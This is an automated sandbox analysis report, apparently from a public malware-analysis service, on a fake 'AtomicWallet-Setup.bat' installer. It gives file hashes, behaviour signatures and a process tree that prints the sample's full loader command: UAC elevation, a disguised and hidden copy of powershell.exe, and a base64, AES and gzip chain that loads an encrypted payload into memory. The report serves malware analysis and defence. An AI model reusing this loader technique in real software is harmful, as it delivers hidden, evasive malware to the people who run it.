Overview

overview

10

Static

static

AtomicWall...up.bat

windows7-x64

8

AtomicWall...up.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    45s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    02-08-2022 23:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AtomicWallet-Setup.bat

  • Size

    22KB

  • MD5

    17204bcbc62deab8d5253c0b4d7e87e9

  • SHA1

    c9766e880155869ac3eaad22382db9ec06a92be3

  • SHA256

    884b3ccd012883b6d74cb4482bd553407c5b53b741d84ce6d87850254f74298f

  • SHA512

    e1f58413373a095c1bc3d6eb4e007bb715d26f583c193f3762903cba63fc856e9daec1e3a81474ab8aab487f3ac1e6eba1db1f242e42d33abbedbd61ff3169d6

Score
8/10
evasion

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat' -ArgumentList 'am_admin'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:952
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat" am_admin
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1340
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo F"
          4⤵
            PID:340
          • C:\Windows\system32\xcopy.exe
            xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe AtomicWallet-Setup.bat.exe /y
            4⤵
              PID:1000
            • C:\Windows\system32\attrib.exe
              attrib +s +h AtomicWallet-Setup.bat.exe
              4⤵
              • Sets file to hidden
              • Views/modifies file attributes
              PID:2036
            • C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat.exe
              AtomicWallet-Setup.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $zicZyG = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat').Split([Environment]::NewLine);$KvIpRz = $zicZyG[$zicZyG.Length - 1];$nqEVyA = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgSU5hdmFYIHsgcHVibGljIHN0YXRpYyBieXRlW10gaE9HWUFyKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gZ2JmUVZiKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9'));Add-Type -TypeDefinition $nqEVyA;[System.Reflection.Assembly]::Load([INavaX]::gbfQVb([INavaX]::hOGYAr([System.Convert]::FromBase64String($KvIpRz), [System.Convert]::FromBase64String('1fXWdSXnAQ0+knTrk1IxqXLqElmFQZxu8O3C1w4kI8k='), [System.Convert]::FromBase64String('idlSmTy8pse2ZfrQ6pO55Q==')))).EntryPoint.Invoke($null, (, [string[]] ('am_admin')))
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:556
              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wgfcua5y.cmdline"
                5⤵
                  PID:1536
              • C:\Windows\system32\attrib.exe
                attrib -s -h AtomicWallet-Setup.bat.exe
                4⤵
                • Views/modifies file attributes
                PID:936

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat.exe
          Filesize

          462KB

          MD5

          852d67a27e454bd389fa7f02a8cbe23f

          SHA1

          5330fedad485e0e4c23b2abe1075a1f984fde9fc

          SHA256

          a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

          SHA512

          327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat.exe
          Filesize

          462KB

          MD5

          852d67a27e454bd389fa7f02a8cbe23f

          SHA1

          5330fedad485e0e4c23b2abe1075a1f984fde9fc

          SHA256

          a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

          SHA512

          327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

          Download Submit

        • \??\c:\Users\Admin\AppData\Local\Temp\wgfcua5y.0.cs
          Filesize

          744B

          MD5

          a94bf575020eda73efcd96205c058132

          SHA1

          008feaf3bccc3650bfd729ba5703ffb4c0facb89

          SHA256

          3d8561f5136363538e332a9a693128d56cf886af5b2cebf6d3ac8e0843e3123b

          SHA512

          96ed071d1cafbb6d80aa5ef24ede28b5e03c36caed7c44dc3f5c6c0340429b1e361fd6e9a9bf4033104fbef843a4b4ba03dadc3ddc28338937b72e3272fd6297

          Download Submit

        • \??\c:\Users\Admin\AppData\Local\Temp\wgfcua5y.cmdline
          Filesize

          309B

          MD5

          2de60330983b92c0fddeab59cd165a73

          SHA1

          6da4470c5bc437f165179a0c0f741c62dfd193b4

          SHA256

          2979e8fd97ff8094b9b1928e6f29080b19b95f687247c335fa8f5597ede26365

          SHA512

          926670b4f9f7530d92caf27214e01736d43444eeed9b8c332da6b4a1355477fc32321b9ae62f526e8f98e494c211b370fabfeb4ef0bf08f8f3d718dc67b67d65

          Download Submit

        • \Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat.exe
          Filesize

          462KB

          MD5

          852d67a27e454bd389fa7f02a8cbe23f

          SHA1

          5330fedad485e0e4c23b2abe1075a1f984fde9fc

          SHA256

          a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

          SHA512

          327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

          Download Submit

        • memory/556-73-0x000000001B720000-0x000000001BA1F000-memory.dmp

          Filesize

          3.0MB

          Download

        • memory/556-77-0x00000000024D4000-0x00000000024D7000-memory.dmp

          Filesize

          12KB

          Download

        • memory/556-80-0x00000000024DB000-0x00000000024FA000-memory.dmp

          Filesize

          124KB

          Download

        • memory/556-79-0x00000000024D4000-0x00000000024D7000-memory.dmp

          Filesize

          12KB

          Download

        • memory/556-78-0x00000000024DB000-0x00000000024FA000-memory.dmp

          Filesize

          124KB

          Download

        • memory/556-72-0x000007FEF2C10000-0x000007FEF376D000-memory.dmp

          Filesize

          11.4MB

          Download

        • memory/556-71-0x000007FEF3770000-0x000007FEF4193000-memory.dmp

          Filesize

          10.1MB

          Download

        • memory/952-58-0x00000000027A4000-0x00000000027A7000-memory.dmp

          Filesize

          12KB

          Download

        • memory/952-59-0x000000001B710000-0x000000001BA0F000-memory.dmp

          Filesize

          3.0MB

          Download

        • memory/952-62-0x00000000027AB000-0x00000000027CA000-memory.dmp

          Filesize

          124KB

          Download

        • memory/952-56-0x000007FEF4110000-0x000007FEF4B33000-memory.dmp

          Filesize

          10.1MB

          Download

        • memory/952-55-0x000007FEFBC01000-0x000007FEFBC03000-memory.dmp

          Filesize

          8KB

          Download

        • memory/952-61-0x00000000027A4000-0x00000000027A7000-memory.dmp

          Filesize

          12KB

          Download

        • memory/952-57-0x000007FEF35B0000-0x000007FEF410D000-memory.dmp

          Filesize

          11.4MB

          Download